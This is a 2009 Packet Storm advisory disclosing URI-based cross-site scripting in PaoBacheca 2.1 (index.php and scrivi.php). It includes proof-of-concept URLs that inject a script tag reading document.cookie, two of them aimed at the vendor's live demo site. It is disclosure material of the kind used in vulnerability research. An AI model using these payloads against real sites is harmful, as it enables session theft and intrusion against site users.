PaoBacheca 2.1 Cross Site Scripting

2009-09-16T00:00:00
ID PACKETSTORM:81364
Type packetstorm
Reporter Moudi
Modified 2009-09-16T00:00:00

Description

                                        
                                            `/*  
  
_____ _ ___ __   
| ____|_ _(_) \ \ / /_ _ _ _   
| _| \ \ / / | |\ \ /\ / / _` | | | |  
| |___ \ V /| | | \ V V / (_| | |_| |  
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |  
|___/   
_____   
|_ _|__ __ _ _ __ ___   
| |/ _ \/ _` | '_ ` _ \   
| | __/ (_| | | | | | |  
|_|\___|\__,_|_| |_| |_|  
  
PaoBacheca 2.1 Remote URI XSS Vulnerabilities  
  
Discovered By : Moudi  
Contact : <m0udi@9.cn>  
Download : http://zenas.org  
  
Greetings : Mizoz, Zuka, str0ke, 599eme Man.  
Please visit: http://unkn0wn.ws/board/index.php  
Please visit: http://ghost-squall.com  
  
*/  
  
[+] Exploit XSS:  
  
- Vulnerable code in index.php (/)  
- Vulnerable code in scrivi.php (/)  
  
- Poc:  
http://127.0.0.1/index.php/[XSS]  
http://127.0.0.1/scrivi.php/[XSS]  
  
http://zenas.org/paobacheca/demo/index.php/"><script>alert(document.cookie);</script>  
http://zenas.org/paobacheca/demo/scrivi.php/"><script>alert(document.cookie);</script>`